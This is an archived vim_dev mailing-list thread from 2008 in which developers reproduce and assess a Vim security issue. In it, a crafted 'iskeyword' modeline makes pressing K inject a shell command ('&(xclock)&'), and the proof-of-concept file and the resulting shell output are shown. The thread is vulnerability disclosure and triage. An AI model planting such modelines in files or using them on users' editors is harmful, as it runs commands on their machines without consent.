On 20/08/08 13:09, Matt Wozniski wrote:
> On Wed, Aug 20, 2008 at 4:33 AM, Tony Mechelynck wrote:
>> On 20/08/08 09:47, Jan Minář wrote:
>>> The above will of course not work. The following will:
>>>
>>> /* We use an obscure glibc function -- check out the man page! */
>>> clockface =&(xclock)&pwnme (a, b, x + y);
>>> /* :vim:iskeyword=a-z,&,),(: */
>> No error this time, but still says ":!seamonkey clockface" and loads
>> http://www.apple.com/
>
> Jan got the exploit right, but formatted his modeline wrong. Try this
> document:
> /* We use an obscure glibc function -- check out the man page! */
> clockface = &(xclock)&pwnme (a, b, x + y);
> /* vim: set iskeyword=a-z,&,),(: */
>
> Make sure ":verbose set isk?" correctly says
> iskeyword=a-z,&,),(
> Last set from modeline
yes, that's what it says
>
> place your cursor on 'pwnme', and press K. xclock appears.
[...]
Ah, yes, this time I see a clock but I can't give it focus, even by
clicking its titlebar; and at the bottom of the gvim window I see
:! seamonkey &(xclock)&pwnme
/bin/bash: pwnme: command not found
shell returned 127
But you got to have the cursor "near enough" to where the "exploiter"
wants it -- previously I put it on clockface and it didn't work -- and
then the user has to manually hit K. Looks to me like the so-called
"exploit" requires quite some cooperation by the user.
Best regards,
Tony.
--
Love's Drug
My love is like an iron wand
That conks me on the head,
My love is like the valium
That I take before my bed,
My love is like the pint of scotch
That I drink when I be dry;
And I shall love thee still, my dear,
Until my wife is wise.
--~--~---------~--~----~------------~-------~--~----~
You received this message from the "vim_dev" maillist.
For more information, visit http://www.vim.org/maillist.php
-~----------~----~----~----~------~----~------~--~---
